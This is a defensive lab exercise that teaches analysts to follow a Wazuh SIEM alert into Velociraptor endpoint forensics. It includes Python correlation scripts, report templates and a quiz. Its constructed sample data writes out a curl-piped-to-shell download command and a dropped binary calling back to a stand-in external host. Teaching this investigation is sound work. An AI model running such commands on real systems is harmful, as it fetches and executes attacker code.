Hands-on Lab · Advanced · ~65 min · Includes challenge

Lab 8.4 — SIEM to Endpoint

Start from a Wazuh alert, pivot to Velociraptor for endpoint investigation, and build a complete incident narrative connecting SIEM detection to endpoint forensic evidence.

Tools needed: Wazuh Dashboard, Velociraptor

What You'll Learn

  • Pivot from a Wazuh SIEM alert to endpoint investigation using Velociraptor
  • Correlate SIEM alert data (rule ID, agent, source IP, timestamp) with live endpoint forensics
  • Collect process details, dropped files, and network connections from the alerted host
  • Build a complete incident narrative connecting the SIEM detection to endpoint evidence
  • Produce an investigation report that answers "Here's what happened on the endpoint"

Lab Overview

Detail          | Value
────────────────┼──────────────────────────────────────────────────────────────────────────
Lab Profile     | lab-wazuh-velo
Containers      | Wazuh Manager, Wazuh Indexer, Wazuh Dashboard, Velociraptor Server, Velociraptor Client
Estimated Time  | 65 minutes
Difficulty      | Advanced
Browser Access  | Wazuh Dashboard (Web UI) + Velociraptor GUI (port 8889)
Pre-Loaded Data | Wazuh alerts for suspicious process + corresponding endpoint artifacts
Deliverable     | "Here's what happened on the endpoint" investigation report

Why SIEM-to-Endpoint Matters. A SIEM alert says "something suspicious happened." But alerts are just the starting point — they tell you WHAT was detected, not the full story. To understand the impact, scope, and timeline of an incident, you must pivot from the alert to the endpoint. This lab teaches the most critical workflow in modern SOC operations: SIEM detection → endpoint investigation → complete incident picture.


The Scenario

Your Wazuh dashboard shows a high-severity alert: suspicious process execution on a monitored host. The alert triggered on a rule that detects unusual command execution patterns. Your job is to:

  1. Analyze the Wazuh alert to extract initial indicators (what, where, when)
  2. Pivot to Velociraptor to investigate the endpoint in depth
  3. Collect forensic data (processes, files, network connections)
  4. Build the complete picture of what happened on the endpoint
  5. Write the investigation report connecting SIEM data to endpoint evidence

This is a two-tool investigation — you'll work across both Wazuh and Velociraptor throughout the lab.


Part 1: SIEM Alert Analysis (Wazuh)

Step 1: Access Wazuh Dashboard

Open the Wazuh web interface from the "Open Lab" button. Log in with:

  • Username: admin
  • Password: cyberblue

Step 2: Find the Suspicious Alert

Navigate to Security Events and look for high-severity alerts (level 10+). You're looking for alerts related to suspicious process execution. Expand the alert and read the fields from its JSON view rather than the summary columns, so you capture the exact values (full command line, agent IP, raw log) rather than an abbreviated display.

Record the following from the alert:

SIEM ALERT ANALYSIS
════════════════════
Alert ID: [Wazuh alert ID]
Rule ID: [rule that triggered]
Rule Description: [what the rule detects]
Severity Level: [numeric level]
Timestamp: [when it occurred]
Agent: [which host]
Agent IP: [host IP address]

KEY FIELDS FROM ALERT
─────────────────────
Process/Command: [suspicious process or command observed]
Source User: [user account]
Source IP: [if applicable]
File Path: [if applicable]
Full Log: [raw log entry]

Step 3: Extract Pivot Indicators

From the Wazuh alert, identify the indicators you'll use to investigate on the endpoint:

PIVOT INDICATORS
════════════════
Hostname/IP: [endpoint to investigate in Velociraptor]
Process Name: [what to look for in process list]
File Path: [what to look for on disk]
User Account: [what user context to focus on]
Timestamp: [when to anchor your investigation]
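To make the extraction concrete, here is an added Python example for this lab; it is not part of Wazuh or of the lab kit. It turns an alert record in the layout Wazuh writes to alerts.json (the same fields the dashboard shows in an alert's JSON view) into the pivot indicators above. The alert is constructed: its rule ID and agent name follow this lab's scenario, while the auditd-style fields under data.audit, the PID, the URL and the user ID are assumptions about how the lab's custom rule is decoded, since the page does not say which log source feeds it.

```python
"""Extract Step 3 pivot indicators from a Wazuh alert record.

Added example for this lab, not Wazuh code. SAMPLE_ALERT is constructed in the
layout Wazuh writes to alerts.json; the data.audit fields are an assumption
about how the lab's custom rule is decoded."""
import json
import re
from datetime import datetime, timezone

SAMPLE_ALERT = json.dumps({
    "timestamp": "2024-05-21T14:32:05.417+0000",
    "id": "1716301925.84123",
    "rule": {"level": 12, "id": "100002",
             "description": "Suspicious command execution: download and execute"},
    "agent": {"id": "003", "name": "linux-web-01", "ip": "10.10.20.15"},
    "decoder": {"name": "auditd"},
    "data": {"audit": {"exe": "/bin/bash", "pid": "4821", "auid": "1001", "cwd": "/tmp",
                       "command": "bash -c curl -s http://198.51.100.5/u.sh | sh"}},
    "full_log": 'type=EXECVE msg=audit(1716301918.902:2214): argc=3 a0="bash" a1="-c" '
                'a2="curl -s http://198.51.100.5/u.sh | sh"',
})

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_wazuh_timestamp(ts):
    """Wazuh writes '2024-05-21T14:32:05.417+0000'; %z accepts the +HHMM offset."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z").astimezone(timezone.utc)


def extract_pivot_indicators(alert_json):
    """Return the fields you carry into Velociraptor; None marks what the alert lacks."""
    alert = json.loads(alert_json)
    audit = alert.get("data", {}).get("audit", {})
    exe = audit.get("exe")
    command = audit.get("command") or ""
    return {
        "alert_id": alert.get("id"),
        "rule_id": alert["rule"]["id"],
        "rule_description": alert["rule"]["description"],
        "level": alert["rule"]["level"],
        "high_severity": alert["rule"]["level"] >= 10,  # the lab's threshold
        "timestamp": parse_wazuh_timestamp(alert["timestamp"]),  # normalized to UTC
        "hostname": alert["agent"]["name"],
        "agent_ip": alert["agent"]["ip"],
        "pid": int(audit["pid"]) if audit.get("pid") else None,
        "process_name": exe.rsplit("/", 1)[-1] if exe else None,
        "binary_path": exe,
        "command": command or None,
        "cwd": audit.get("cwd"),
        "user": audit.get("auid"),  # a numeric uid; resolve it to a name on the endpoint
        # Addresses embedded in the command line become network indicators for Step 8.
        "network_indicators": sorted(set(IPV4.findall(command))),
        "full_log": alert.get("full_log"),
    }


def missing_indicators(indicators):
    """Pivot fields the alert did not supply, i.e. where you would be searching blind."""
    required = ("hostname", "process_name", "binary_path", "user", "timestamp")
    return [k for k in required if indicators.get(k) is None]
```

Run missing_indicators() on the result before you switch tools: an empty list means every field the endpoint investigation anchors on is present; anything listed has to come from the endpoint itself.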

[Figure: SIEM to Endpoint Workflow]

Extract Before You Pivot. Always document ALL available data from the SIEM alert before switching to Velociraptor. You want specific process names, file paths, user accounts, and timestamps to guide your endpoint investigation. Going to the endpoint without these indicators means searching blindly. Note the time zone as well: Wazuh alert timestamps carry a UTC offset, while Velociraptor displays UTC by default, so normalize both before comparing times.


Part 2: Endpoint Investigation (Velociraptor)

Step 4: Access Velociraptor

Open the Velociraptor GUI (port 8889). Log in with:

  • Username: admin
  • Password: cyberblue

Step 5: Locate the Alerted Host

Find the host mentioned in the Wazuh alert. Velociraptor identifies endpoints by client ID (C.xxxxxxxx), not by the Wazuh agent ID, so search by hostname and then open the client view.

Verify the host matches by confirming:

  • Hostname matches the Wazuh agent name
  • OS information is consistent
  • Client is currently connected (green status)

Record the client ID; the correlation table in Part 4 maps the Wazuh agent to it.

Step 6: Collect Process Details

Using the process name from the Wazuh alert, collect detailed process information:

  1. Run Linux.Sys.Pslist to get the full process listing
  2. Find the suspicious process (or its descendants)
  3. Record PID, PPID, full command line, user, and path

Linux.Sys.Pslist only sees processes that are alive when the collection runs. If the alerted process has already exited, record it as terminated, look for its parent and any children that are still running, and take the command line from the Wazuh full log instead.

PROCESS INVESTIGATION
═════════════════════
Alert Process: [process mentioned in Wazuh alert]
Current Status: [still running / terminated]
PID: [process ID]
PPID: [parent process ID]
Full Command Line: [complete command with arguments]
User Context: [running as which user]
Binary Path: [where the executable lives]
Parent Process: [what launched it]

Part 3: Expanding the Investigation

Step 7: Check for Dropped Files

Based on the process details, collect file information for suspicious paths:

  1. Use Velociraptor to list files in the directories identified from the process investigation (Linux.Search.FileFinder takes a glob such as the working directory or the binary's directory, and can hash and upload what it finds)
  2. Look for files created or modified around the alert timestamp
  3. Check for hidden files and directories (names starting with a dot, especially under /tmp, /dev/shm and home directories)

Document any suspicious files found:

DROPPED FILES ANALYSIS
══════════════════════
File 1:
  Path: [full path]
  Size: [bytes]
  Created: [timestamp]
  Modified: [timestamp]
  Permissions: [rwx]
  Owner: [user:group]
  Content Type: [script / binary / data]
  Hash (if available): [MD5/SHA256]

Step 8: Check Network Connections

Collect network connection data to see if the suspicious process is communicating externally:

  1. Run Linux.Sys.Netstat to get current connections
  2. Cross-reference PIDs with your process findings (the whole process tree, not only the alerted PID; a dropped binary often holds the connection instead of the shell that launched it)
  3. Identify any external connections

Netstat is a point-in-time snapshot: a short-lived connection, such as the download that triggered the alert, may already be gone, so record what the snapshot does not show as well as what it does.

NETWORK CONNECTION ANALYSIS
═══════════════════════════
Connection 1:
  Process: [name] (PID: [x])
  Local: [address:port]
  Remote: [address:port]
  State: [ESTABLISHED/LISTEN/etc]
  Direction: [Inbound / Outbound]
  Suspicious: [Yes/No — reason]

Step 9: Check for Persistence

Given that the attacker had access, check common persistence locations:

  1. Cron jobs (Linux.Sys.Crontab)
  2. Recently modified systemd units and timers under /etc/systemd/system and in user unit directories
  3. SSH authorized keys
  4. Shell configuration files (.bashrc, .profile, /etc/profile.d)

Compare modification times against the alert timestamp: a persistence file written in the minutes after the alerted command is the strongest link back to the SIEM detection.

PERSISTENCE CHECK
═════════════════
Cron: [findings or "Clean"]
Systemd: [findings or "Clean"]
SSH Keys: [findings or "Clean"]
Shell Config: [findings or "Clean"]

Don't Stop at the Alert. The Wazuh alert showed you ONE suspicious event. But once you're on the endpoint, you need to check the FULL scope — what else did the attacker do? Additional processes, files, connections, and persistence mechanisms may exist that Wazuh didn't generate alerts for. The endpoint tells the complete story.


Part 4: Correlating SIEM and Endpoint Data

Step 10: Build the Correlation Table

Connect your Wazuh findings with your Velociraptor findings:

SIEM ↔ ENDPOINT CORRELATION
════════════════════════════
SIEM Alert                          → Endpoint Evidence
──────────────────────────────────────────────────────────
Rule [ID]: [description]            → Process: [name] running from [path]
Agent: [hostname]                   → Client: [Velociraptor client ID]
Source user: [user]                 → Process owner: [confirmed user]
Timestamp: [alert time]            → Process start: [Velociraptor timestamp]
Suspicious command: [from alert]    → Full command line: [from Velociraptor]

ADDITIONAL ENDPOINT FINDINGS (not in SIEM)
──────────────────────────────────────────
1. [Finding not covered by any Wazuh alert]
2. [Finding not covered by any Wazuh alert]
3. [Finding not covered by any Wazuh alert]
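The steps in Part 3 and the correlation above can be run as code once you download collection results from Velociraptor as JSON. The Python below is an added example for this lab, not Wazuh or Velociraptor code: it matches the alerted process in a Pslist export, walks its descendants, joins the tree to Netstat rows, flags files modified in the window after the process started, and lists what the endpoint shows that the SIEM did not. All rows are constructed to carry the lab scenario's values; the column names follow Linux.Sys.Pslist, Linux.Sys.Netstat and a glob() listing as assumed here, so check them against your own export before reusing it.

```python
"""Correlate Step 3 pivot indicators with Velociraptor output (Steps 6-10).
Added example for this lab, not Wazuh or Velociraptor code. All rows are
constructed to look like a Velociraptor JSON export; column names follow
Linux.Sys.Pslist, Linux.Sys.Netstat and a glob() listing as assumed here."""
import ipaddress
from datetime import datetime, timezone

# Step 3 pivot indicators from the Wazuh alert, constructed for the scenario.
PIVOT = {"binary_path": "/bin/bash", "pid": 4821,
         "command_fragment": "curl -s http://198.51.100.5/u.sh",
         "timestamp": datetime(2024, 5, 21, 14, 32, 5, tzinfo=timezone.utc)}

# Constructed Linux.Sys.Pslist rows: a web server spawning a shell is the lead.
PSLIST = [
    {"Pid": 1203, "Ppid": 1, "Name": "nginx", "Path": "/usr/sbin/nginx",
     "CommandLine": "nginx: worker process", "CreateTime": "2024-05-01T09:00:12Z"},
    {"Pid": 4821, "Ppid": 1203, "Name": "bash", "Path": "/bin/bash",
     "CommandLine": "bash -c curl -s http://198.51.100.5/u.sh | sh",
     "CreateTime": "2024-05-21T14:31:58.902137541Z"},
    {"Pid": 4830, "Ppid": 4821, "Name": "sh", "Path": "/bin/dash",
     "CommandLine": "sh", "CreateTime": "2024-05-21T14:31:59.104Z"},
    {"Pid": 4837, "Ppid": 4830, "Name": ".cache-upd", "Path": "/tmp/.cache-upd",
     "CommandLine": "/tmp/.cache-upd -c 198.51.100.5:443", "CreateTime": "2024-05-21T14:32:01Z"},
]
# Constructed Linux.Sys.Netstat rows (Laddr/Raddr are nested objects in the export).
NETSTAT = [
    {"Pid": 1203, "Status": "ESTABLISHED", "Laddr": {"IP": "10.10.20.15", "Port": 80},
     "Raddr": {"IP": "10.10.20.7", "Port": 41220}},
    {"Pid": 4837, "Status": "ESTABLISHED", "Laddr": {"IP": "10.10.20.15", "Port": 50344},
     "Raddr": {"IP": "198.51.100.5", "Port": 443}},
]
# Constructed glob() rows for Steps 7 and 9.
FILES = [
    {"OSPath": "/tmp/.cache-upd", "Mtime": "2024-05-21T14:32:00Z"},
    {"OSPath": "/var/spool/cron/crontabs/www-data", "Mtime": "2024-05-21T14:32:03Z"},
    {"OSPath": "/etc/nginx/nginx.conf", "Mtime": "2024-05-01T08:55:00Z"},
]
# Your own address space, listed explicitly: ipaddress.is_global would class the
# 198.51.100.0/24 documentation range used in this scenario as non-global.
INTERNAL = [ipaddress.ip_network(n) for n in ("0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8",
                                              "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16")]


def parse_ts(s):
    """Velociraptor exports RFC 3339 UTC with up to nanoseconds; fromisoformat takes
    at most six fractional digits and, before Python 3.11, no trailing 'Z'."""
    if not s.endswith("Z"):
        raise ValueError(f"expected a UTC 'Z' timestamp, got {s!r}")
    body = s[:-1]
    if "." in body:
        base, frac = body.split(".", 1)
        body = f"{base}.{frac[:6].ljust(6, '0')}"
    return datetime.fromisoformat(body).replace(tzinfo=timezone.utc)


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL)


def is_persistence_path(path):
    """Step 9 locations: cron, systemd units, SSH authorized keys, shell startup files."""
    return (path.startswith(("/etc/cron", "/var/spool/cron", "/etc/systemd/system"))
            or path.endswith(("/.ssh/authorized_keys", "/.bashrc", "/.profile", "/.bash_profile")))


def find_alerted_process(pivot, pslist):
    """Match by PID when the alert carries one, else by binary path plus command text."""
    for r in pslist:
        if r["Pid"] == pivot.get("pid") and r["Path"] == pivot["binary_path"]:
            return r
    for r in pslist:
        if r["Path"] == pivot["binary_path"] and pivot["command_fragment"] in r["CommandLine"]:
            return r
    return None  # already exited: Pslist only sees live processes


def descendants(pslist, root_pid):
    """Every process whose parent chain leads back to root_pid: the attacker's tree."""
    found, frontier = [], [root_pid]
    while frontier:
        pid = frontier.pop()
        for r in pslist:
            if r["Ppid"] == pid:
                found.append(r)
                frontier.append(r["Pid"])
    return found


def correlate(pivot, pslist, netstat, files, window_seconds=900):
    """Step 10: alert on the left, endpoint evidence on the right, plus endpoint-only findings."""
    proc = find_alerted_process(pivot, pslist)
    if proc is None:
        return {"status": "terminated", "not_in_siem": []}
    tree = descendants(pslist, proc["Pid"])
    pids = {proc["Pid"]} | {r["Pid"] for r in tree}
    start = parse_ts(proc["CreateTime"])
    ext = [c for c in netstat if c["Pid"] in pids and is_external(c["Raddr"]["IP"])]
    recent = [f for f in files
              if 0 <= (parse_ts(f["Mtime"]) - start).total_seconds() <= window_seconds]
    return {
        "status": "running", "process": proc, "tree": tree,
        "parent": next((r for r in pslist if r["Pid"] == proc["Ppid"]), None),
        # Positive = alert written after the process started (normal ingestion lag);
        # negative = clock skew between hosts, or you matched the wrong process.
        "gap_seconds": (pivot["timestamp"] - start).total_seconds(),
        "external": ext,
        "persistence": [f for f in recent if is_persistence_path(f["OSPath"])],
        "not_in_siem": [f"child {r['Name']} (PID {r['Pid']}) from {r['Path']}" for r in tree]
        + [f"{c['Status']} to {c['Raddr']['IP']}:{c['Raddr']['Port']} by PID {c['Pid']}" for c in ext]
        + [f"modified {f['OSPath']} at {f['Mtime']}" for f in recent],
    }
```

Two design points carry over to real investigations. First, the join to Netstat runs over the whole process tree, because in this shape of intrusion the shell from the alert rarely owns the outbound connection; the dropped binary does. Second, is_external() lists your internal ranges explicitly instead of calling ipaddress's is_global, which classes the 198.51.100.0/24 documentation range in the scenario as non-global and would hide the very connection you are looking for.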

[Figure: Investigation Report Template]


Part 5: Investigation Report

Step 11: Write the Final Report

SIEM-TO-ENDPOINT INVESTIGATION REPORT
══════════════════════════════════════
Investigation ID: [your reference number]
Date: [today's date]
Analyst: [your name]
Classification: [Confirmed Incident / False Positive / Inconclusive]

TRIGGER
───────
Wazuh Alert: [rule ID — description]
Severity: [level]
Time: [timestamp]
Host: [agent name / IP]

EXECUTIVE SUMMARY
─────────────────
[2-3 sentences: What happened, how bad is it, what needs to be done]

INVESTIGATION TIMELINE
──────────────────────
[T+0]  SIEM alert received — [description]
[T+X]  Pivoted to Velociraptor — confirmed [what]
[T+X]  Process investigation — found [what]
[T+X]  File investigation — discovered [what]
[T+X]  Network investigation — identified [what]
[T+X]  Persistence check — found [what]

IMPACT ASSESSMENT
─────────────────
Affected Systems: [list]
Data at Risk: [what data could be compromised]
Lateral Movement: [evidence of spreading to other systems?]
Persistence: [mechanisms found — can attacker return?]

EVIDENCE INVENTORY
──────────────────
Source          | Evidence Type      | Key Finding
──────────────────────────────────────────────────
Wazuh           | Alert              | [description]
Velociraptor    | Process data       | [description]
Velociraptor    | File data          | [description]
Velociraptor    | Network data       | [description]
Velociraptor    | Persistence data   | [description]

RECOMMENDATIONS
───────────────
Immediate:
1. [First action to take NOW]
2. [Second immediate action]

Short-term:
3. [Action within 24 hours]
4. [Action within 48 hours]

Long-term:
5. [Prevention measure]
6. [Detection improvement]

Deliverable Checklist

Before completing the lab, ensure you have:

  • SIEM Alert Analysis — fully documented the Wazuh alert with all key fields
  • Pivot Indicators — extracted hostname, process, file path, user, and timestamp
  • Process Investigation — collected and analyzed process details via Velociraptor
  • File Investigation — identified dropped files and suspicious content
  • Network Investigation — checked for external connections
  • Persistence Check — verified cron, systemd, SSH, and shell configs
  • Correlation Table — mapped SIEM data to endpoint evidence
  • Investigation Report — complete "Here's what happened" narrative

Key Takeaways

  • SIEM alerts are the starting point, not the conclusion — always pivot to the endpoint for the full picture
  • Extract ALL indicators from the alert before switching tools (hostname, process, path, user, timestamp)
  • Endpoint investigation often reveals activity the SIEM missed — additional processes, files, and persistence
  • The correlation between SIEM detection and endpoint evidence builds the complete incident narrative
  • A good investigation report answers: What happened? How bad is it? Can they come back? What do we do next?

What's Next

Congratulations on completing the Endpoint Visibility labs! You've mastered the core workflow: from endpoint collection, through process tree analysis and persistence hunting, to the critical SIEM-to-endpoint investigation pivot. In Module 9, you'll explore threat intelligence integration with MISP.

Lab Challenge: SIEM to Endpoint

10 questions · 70% to pass

1. You see a Wazuh alert for suspicious process execution on host 'linux-web-01'. What is the FIRST thing you should do before pivoting to Velociraptor?

2. The Wazuh alert shows rule.id: 100002 with a suspicious command on agent 'linux-web-01'. In Velociraptor, how do you confirm you're investigating the correct host?

3. You found the suspicious process via Velociraptor. It matches the Wazuh alert. What should you investigate NEXT?

4. Your Velociraptor investigation reveals 3 additional suspicious findings that have NO corresponding Wazuh alerts. What does this demonstrate?

5. You collect network connections via Velociraptor and find the alerted process has an ESTABLISHED connection to 198.51.100.5:443. How does this enhance the Wazuh alert data?

6. During your persistence check, you find a cron job that wasn't mentioned in any Wazuh alert. Why might Wazuh have missed this?

7. Your correlation table shows the Wazuh timestamp is 14:32:05 and the Velociraptor process start time is 14:31:58. What does this 7-second gap indicate?

8. In your investigation report's Impact Assessment, you should evaluate 'Lateral Movement.' Why is this critical?

9. Your investigation report recommends both 'Immediate' and 'Long-term' actions. Which is an appropriate IMMEDIATE recommendation?

10. After completing this SIEM-to-Endpoint investigation, what is the KEY advantage of having BOTH Wazuh and Velociraptor in your SOC toolkit?
